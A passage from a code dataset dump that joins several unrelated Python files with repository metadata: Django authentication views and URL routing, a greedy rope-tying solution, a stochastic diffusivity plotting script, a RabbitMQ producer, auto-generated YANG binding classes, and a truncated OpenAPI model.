os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sssionpro.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
e5c3105a3f2f825626898ed2c619b599f820a0e9 | f1a8e308c76866e2fba20401e6f1d5842dd60c46 | /Algorithms and Data Structures Practice/LeetCode Questions/Greedy/TieRopes.py | 0ca4144df73641761d8095f25ec57753846b4744 | [] | no_license | harman666666/Algorithms-Data-Structures-and-Design | 6e5da0c1f701e7dfc7b045ecd1209463131d3fc7 | 483f0c93faca8ccaf038b77ebe2fa712f6b0c6bc | refs/heads/master | 2021-07-14T10:11:27.588838 | 2021-07-07T01:47:42 | 2021-07-07T01:47:42 | 101,330,760 | 3 | 1 | null | 2018-10-15T04:52:07 | 2017-08-24T19:32:03 | Python | UTF-8 | Python | false | false | 2,234 | py | '''
There are N ropes numbered from 0 to N − 1, whose lengths are given in an array A, lying on the floor in a line. For each I (0 ≤ I < N), the length of rope I on the line is A[I].
We say that two ropes I and I + 1 are adjacent. Two adjacent ropes can be tied together with a knot, and the length of the tied rope is the sum of lengths of both ropes. The resulting new rope can then be tied again.
For a given integer K, the goal is to tie the ropes in such a way that the number of ropes whose length is greater than or equal to K is maximal.
For example, consider K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
The ropes are shown in the figure below.
We can tie:
rope 1 with rope 2 to produce a rope of length A[1] + A[2] = 5;
rope 4 with rope 5 with rope 6 to produce a rope of length A[4] + A[5] + A[6] = 5.
After that, there will be three ropes whose lengths are greater than or equal to K = 4. It is not possible to produce four such ropes.
Write a function:
def solution(K, A)
that, given an integer K and a non-empty array A of N integers, returns the maximum number of ropes of length greater than or equal to K that can be created.
For example, given K = 4 and array A such that:
A[0] = 1
A[1] = 2
A[2] = 3
A[3] = 4
A[4] = 1
A[5] = 1
A[6] = 3
the function should return 3, as explained above.
Write an efficient algorithm for the following assumptions:
N is an integer within the range [1..100,000];
K is an integer within the range [1..1,000,000,000];
each element of array A is an integer within the range [1..1,000,000,000].
'''
# you can write to stdout for debugging purposes, e.g.
# print("this is a debug message")
def solution(K, A):
'''
Identify ropes that are smaller,
than K, and merge them together.
but dont merge with a rope that is already greater than K.
Or just look at first rope, if its less than K,
merge with right one,
'''
sum = 0
count = 0
for i in A:
if (sum + i) >= K:
count += 1
sum = 0
else:
sum += i
return count
| [
"[email protected]"
] | |
685fda18ad8cf4719f324feb24e823122bb0d341 | 795df757ef84073c3adaf552d5f4b79fcb111bad | /stochastic_diffusion/diffusivity_1d_xk.py | 62a6b21a6bbb4ecffa0bba1ee3ca9d405324092c | [] | no_license | tnakaicode/jburkardt-python | 02cb2f9ba817abf158fc93203eb17bf1cb3a5008 | 1a63f7664e47d6b81c07f2261b44f472adc4274d | refs/heads/master | 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,885 | py | #! /usr/bin/env python3
#
def diffusivity_1d_xk ( dc0, m, omega, n, x ):
#*****************************************************************************80
#
## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function.
#
# Discussion:
#
# The 1D diffusion equation has the form
#
# - d/dx ( DC(X) Del U(X) ) = F(X)
#
# where DC(X) is a function called the diffusivity.
#
# In the stochastic version of the problem, the diffusivity function
# includes the influence of stochastic parameters:
#
# - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X).
#
# In this function, the domain is assumed to be the unit interval [0.1].
#
#
# For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0,
# U(1OMEGA) = 1, the exact solution is
#
# If OMEGA ~= 0:
#
# U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA )
#
# If OMEGA = 0:
#
# U(XOMEGA) = X
#
# In the numerical experiments described in the paper, OMEGA was taken
# to be a random variable with a Beta, or Uniform, or Gaussian or
# Poisson or Binomial distribution.
#
# For the Gaussian and Poisson distributions, the positivity requirement could not
# be guaranteed, and the experiments were simply made with a "small"
# variance of 0.1.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 20 December 2009
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
# Parameters:
#
# Input, real DC0, the constant term in the expansion of the
# diffusion coefficient.
#
# Input, integer M, the number of stochastic parameters.
#
# Input, real OMEGA(M), the stochastic parameters.
#
# Input, integer N, the number of evaluation points.
#
# Input, real X(N), the point where the diffusion coefficient is to
# be evaluated.
#
# Output, real DC(N), the value of the diffusion coefficient at X.
#
import numpy as np
k = 0
w = 1.0
arg = np.zeros(n)
while ( k < m ):
if ( k < m ):
arg = arg + omega[k] * np.sin ( w * np.pi * x )
k = k + 1
if ( k < m ):
arg = arg + omega[k] * np.cos ( w * np.pi * x )
k = k + 1
w = w + 1.0
arg = np.exp ( - 0.125 ) * arg
dc = dc0 + np.exp ( arg )
return dc
def diffusivity_1d_xk_contour ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function.
#
# Discussion:
#
# The diffusivity function is compute by DIFFUSIVITY_1D_XK.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
import matplotlib.pyplot as plt
import numpy as np
print ( '' )
print ( 'diffusivity_1d_xk_contour' )
print ( ' Display the stochastic diffusivity function' )
print ( ' defined by DIFFUSIVITY_1D_XK.' )
#
# Set the spatial grid.
#
n = 51
x_min = -1.0
x_max = +1.0
x = np.linspace ( x_min, x_max, n )
#
# Sample the OMEGA values.
# Use a seed of 0 for the MATLAB random number generator.
#
m = 5
omega = np.random.randn ( m )
#
# Compute the diffusivity field.
#
dc0 = 10.0
dc = diffusivity_1d_xk ( dc0, m, omega, n, x )
#
# Plot the diffusivity field.
#
plt.plot ( x, dc, linewidth = 2 )
plt.grid ( True )
plt.xlabel ( '<--- X --->' )
plt.ylabel ( 'DC(X)' )
plt.title ( 'XK Stochastic diffusivity function' )
filename = 'diffusivity_1d_xk.png'
plt.savefig ( filename )
print ( '' )
print ( ' Graphics saved as "%s".' % ( filename ) )
return
def diffusivity_1d_xk_test ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_test tests diffusivity_1d_xk.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# None
#
import platform
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' Test diffusivity_1d_xk.' )
diffusivity_1d_xk_contour ( )
#
# Terminate.
#
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
diffusivity_1d_xk_test ( )
timestamp ( )
| [
"[email protected]"
] | |
f4f21fb5b2c269df3326b786e78e6edc3d4fb923 | 5b002b82b025ee371432b436a0c19b000a0df2dd | /setup.py | 93cb4423f1905fc32138f022a24043d62d1e8831 | [
"Apache-2.0"
] | permissive | mvexel/whathappened | c5bfeeb1f41b20cd2f5f4c7782412a39090868b2 | 92805128d2a01909d89fca0650b585d8cac256e0 | refs/heads/master | 2021-01-19T09:10:53.189344 | 2017-04-10T00:05:24 | 2017-04-10T00:05:24 | 87,735,951 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from setuptools import setup
setup(
name='whathappened',
packages=['whathappened'],
include_package_data=True,
install_requires=[
'flask',
'requests',
'gunicorn==19.7.0'
],
)
| [
"[email protected]"
] | |
a1eeaddd15d2c948ed131f7a126f1ce98e9c1c6c | c8f023c1e2c9ecb9ffe328044ef3f013de0857a7 | /src/apps/authentication/views.py | 2523e22d739640c45818632c83a2d47a605d0269 | [
"MIT"
] | permissive | snicoper/django-boilerplate | 851932459fca8b4a6c9220d8ad3ca8f94b14b7a2 | 88cc24c3a2e935fd1be139368288cae6c38679e4 | refs/heads/master | 2021-01-18T18:40:36.633342 | 2018-10-15T07:54:59 | 2018-10-15T07:54:59 | 29,604,293 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,839 | py | from django.conf import settings
from django.contrib import messages
from django.contrib.auth import get_user_model, views
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.sites.shortcuts import get_current_site
from django.shortcuts import get_object_or_404, redirect, render
from django.urls import reverse, reverse_lazy
from django.utils.translation import ugettext as _
from django.views import generic
from utils.http import get_full_path
from utils.mail import send_templated_mail
from utils.mixins.views import AnonymousRequiredMixin
from .forms import AuthenticationForm, RegisterUserForm, UserEmailUpdateForm
from .models import RegisterUser, UserEmailUpdate
UserModel = get_user_model()
class RegisterUserFormView(AnonymousRequiredMixin, generic.CreateView):
template_name = 'authentication/register.html'
form_class = RegisterUserForm
model = RegisterUser
def __init__(self, *args, **kwargs):
"""Elimina posibles usuarios expirados."""
RegisterUser.objects.delete_expired_users_temp()
super().__init__(*args, **kwargs)
def get_success_url(self):
"""Si todo OK, envía el email para verificación y redirecciona."""
self._send_email_with_token()
return reverse('authentication:success')
def _send_email_with_token(self):
"""Envía un email con token para terminar proceso de registro."""
current_site = get_current_site(self.request)
site_name = current_site.name
url_validate_token = get_full_path(
self.request,
'authentication:validate_token',
token=self.object.token
)
context = {
'username': self.object.username,
'email': self.object.email,
'site_name': site_name,
'url_validate_token': url_validate_token
}
send_templated_mail(
subject=_(f'Validación de email en {site_name}'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[self.object.email],
context=context,
template_text='authentication/emails/register_success.txt'
)
class RegisterUserSuccessView(AnonymousRequiredMixin, generic.TemplateView):
template_name = 'authentication/success.html'
class RegisterUserValidateTokenView(AnonymousRequiredMixin, generic.TemplateView):
"""Validación email de un nuevo registro a través del token."""
template_name = 'authentication/validate_token.html'
def get(self, request, *args, **kwargs):
RegisterUser.objects.delete_expired_users_temp()
token = self.kwargs.get('token')
try:
user_temp = RegisterUser.objects.get(token=token)
except RegisterUser.DoesNotExist:
return render(request, 'authentication/token_not_exists.html')
RegisterUser.objects.move_user_tmp_to_users(UserModel, user_temp)
messages.success(request, _('El registro se ha completado con éxito'))
return redirect(reverse('authentication:login'))
class LoginView(AnonymousRequiredMixin, views.LoginView):
template_name = 'authentication/login.html'
form_class = AuthenticationForm
class LogoutView(LoginRequiredMixin, views.LogoutView):
template_name = 'authentication/logged_out.html'
class PasswordResetView(AnonymousRequiredMixin, views.PasswordResetView):
template_name = 'authentication/password_reset_form.html'
email_template_name = 'authentication/emails/password_reset_email.html'
subject_template_name = 'authentication/emails/password_reset_subject.txt'
success_url = reverse_lazy('authentication:password_reset_done')
class PasswordResetDoneView(AnonymousRequiredMixin, views.PasswordResetDoneView):
template_name = 'authentication/password_reset_done.html'
class PasswordResetConfirmView(AnonymousRequiredMixin, views.PasswordResetConfirmView):
template_name = 'authentication/password_reset_confirm.html'
success_url = reverse_lazy('authentication:password_reset_complete')
class PasswordResetCompleteView(AnonymousRequiredMixin, views.PasswordResetCompleteView):
template_name = 'authentication/password_reset_complete.html'
class PasswordChangeView(views.PasswordChangeView):
template_name = 'authentication/password_change_form.html'
success_url = reverse_lazy('authentication:password_change_done')
class PasswordChangeDoneView(views.PasswordChangeDoneView):
template_name = 'authentication/password_change_done.html'
class UserEmailUpdateView(LoginRequiredMixin, generic.FormView):
template_name = 'authentication/email_update.html'
form_class = UserEmailUpdateForm
model = UserEmailUpdate
def get_initial(self):
"""Establece datos en los campos del form."""
initial = super().get_initial()
initial['user'] = self.request.user.id
initial['token'] = UserEmailUpdate.objects.generate_unique_token()
initial['new_email'] = self.request.user.email
return initial
def form_valid(self, form):
"""Envía el email de confirmación."""
new_email = form.cleaned_data['new_email']
token = form.cleaned_data['token']
UserEmailUpdate.objects.update_or_create(
defaults={'new_email': new_email, 'token': token},
user=self.request.user
)
self._send_confirm_email_for_validate(token, new_email)
return super().form_valid(form)
def get_success_url(self):
msg = _('Se ha enviado un email a la nueva dirección para la confirmación')
messages.success(self.request, msg)
return reverse('accounts:profile')
def _send_confirm_email_for_validate(self, token, new_email):
"""Envía un email para la confirmación del nuevo email con un token."""
current_site = get_current_site(self.request)
url_validate_token = get_full_path(
self.request,
'authentication:email_update_validate',
token=token
)
context = {
'url_validate_token': url_validate_token,
'site_name': current_site.name
}
send_templated_mail(
subject=_('Confirmación cambio de email'),
from_email=settings.GROUP_EMAILS['NO-REPLY'],
recipients=[new_email],
context=context,
template_text='authentication/emails/email_update_confirm.txt'
)
class UserEmailUpdateValidateView(LoginRequiredMixin, generic.View):
"""Verifica el token de cambio de email.
Para mayor seguridad, el usuario ha de estar logueado.
Una vez comprobado y actualizado el nuevo email, elimina el
email temporal.
"""
def get(self, request, *args, **kwargs):
"""Comprueba el token que coincida."""
token = kwargs.get('token')
try:
email_update = UserEmailUpdate.objects.get(token=token, user=request.user)
except UserEmailUpdate.DoesNotExist:
return redirect('authentication:token_email_not_exists')
self.request.user.email = email_update.new_email
self.request.user.save()
email_update.delete()
messages.success(request, _('Se ha actualizado el email'))
return redirect(reverse('accounts:profile'))
class UserEmailUpdateNotFoundView(generic.TemplateView):
"""El token no existe o no pertenece al usuario."""
template_name = 'authentication/token_email_not_exists.html'
class UserRemoveEmailUpdateView(generic.View):
"""Eliminar un email no confirmado por parte del usuario."""
def post(self, request, *args, **kwargs):
get_object_or_404(UserEmailUpdate, user=request.user).delete()
messages.success(request, _('Email eliminado con éxito'))
return redirect(reverse('accounts:profile'))
| [
"[email protected]"
] | |
18cca05e8062f4f535054f5fd1a51304be50beb2 | 052275c2dd6d59a0d0fcfe85591b44106343662b | /listings/urls.py | a3b13c17beedfeffab4f7f72383dfe1ae84efa0b | [] | no_license | nimadorostkar/Django-Real-Estate | 93d104ad1847674103e525ae428af186fffa9e30 | bf868e49bb4703e4081d8e7e9fd5e3ae23fc9af9 | refs/heads/master | 2023-08-10T17:07:29.829253 | 2021-09-19T10:55:47 | 2021-09-19T10:55:47 | 338,533,461 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | from django.urls import path
from .views import (ListingListView, ListingDetailView, search)
urlpatterns = [
path('', ListingListView.as_view(), name='listings'),
path('<int:pk>', ListingDetailView.as_view(), name='listing'),
path('search', search, name='search'),
]
| [
"[email protected]"
] | |
0efcee193c5cdeb0e1fe1f35336a1798a94c1084 | 59080f5116b9e8f625b5cc849eb14b7ff9d19f3d | /122 rabbitmq/producer.py | f519020c40c53d1b353416228a61b9216f10522a | [] | no_license | yyq1609/Python_road | eda2bcd946b480a05ec31cdcb65e35b3f3e739d1 | e9ba2f47c8dd2d00a6e5ddff03c546152efd8f49 | refs/heads/master | 2020-09-11T11:51:35.903284 | 2019-11-11T13:02:21 | 2019-11-11T13:02:21 | 222,054,462 | 1 | 0 | null | 2019-11-16T05:58:13 | 2019-11-16T05:58:12 | null | UTF-8 | Python | false | false | 535 | py | import pika
credentials = pika.PlainCredentials('echo', '123')
connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials))
channel = connection.channel()
channel.queue_declare(queue='test', durable=True)
channel.basic_publish(exchange='',
routing_key='test',
body='One order here!',
properties=pika.BasicProperties(delivery_mode=2),
)
print('下单成功')
connection.close() | [
"[email protected]"
] | |
ab0b4cfbf9f72161aa117b1b37987e52089b9254 | adea9fc9697f5201f4cb215571025b0493e96b25 | /napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/__init__.py | 1f2406bbde92beb73269b6ba92ec5145b67db728 | [
"Apache-2.0"
] | permissive | andyjsharp/napalm-yang | d8a8b51896ef7c6490f011fe265db46f63f54248 | ef80ebbfb50e188f09486380c88b058db673c896 | refs/heads/develop | 2021-09-09T02:09:36.151629 | 2018-03-08T22:44:04 | 2018-03-08T22:44:04 | 114,273,455 | 0 | 0 | null | 2018-03-08T22:44:05 | 2017-12-14T16:33:35 | Python | UTF-8 | Python | false | false | 14,778 | py |
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
unicode = str
elif six.PY2:
import __builtin__
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
| [
"[email protected]"
] | |
609f208316babac07ccff737f84094897e5d863c | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /dbpedia/models/unknown.py | dd1afb9f030bccf6a3766988d89ff96438847c90 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,224 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from dbpedia.configuration import Configuration
class Unknown(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'description': 'list[str]',
'id': 'str',
'label': 'list[str]',
'type': 'list[str]'
}
attribute_map = {
'description': 'description',
'id': 'id',
'label': 'label',
'type': 'type'
}
def __init__(self, description=None, id=None, label=None, type=None, local_vars_configuration=None): # noqa: E501
"""Unknown - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._description = None
self._id = None
self._label = None
self._type = None
self.discriminator = None
self.description = description
if id is not None:
self.id = id
self.label = label
self.type = type
@property
def description(self):
"""Gets the description of this Unknown. # noqa: E501
small description # noqa: E501
:return: The description of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this Unknown.
small description # noqa: E501
:param description: The description of this Unknown. # noqa: E501
:type: list[str]
"""
self._description = description
@property
def id(self):
"""Gets the id of this Unknown. # noqa: E501
identifier # noqa: E501
:return: The id of this Unknown. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this Unknown.
identifier # noqa: E501
:param id: The id of this Unknown. # noqa: E501
:type: str
"""
self._id = id
@property
def label(self):
"""Gets the label of this Unknown. # noqa: E501
short description of the resource # noqa: E501
:return: The label of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this Unknown.
short description of the resource # noqa: E501
:param label: The label of this Unknown. # noqa: E501
:type: list[str]
"""
self._label = label
@property
def type(self):
"""Gets the type of this Unknown. # noqa: E501
type of the resource # noqa: E501
:return: The type of this Unknown. # noqa: E501
:rtype: list[str]
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this Unknown.
type of the resource # noqa: E501
:param type: The type of this Unknown. # noqa: E501
:type: list[str]
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
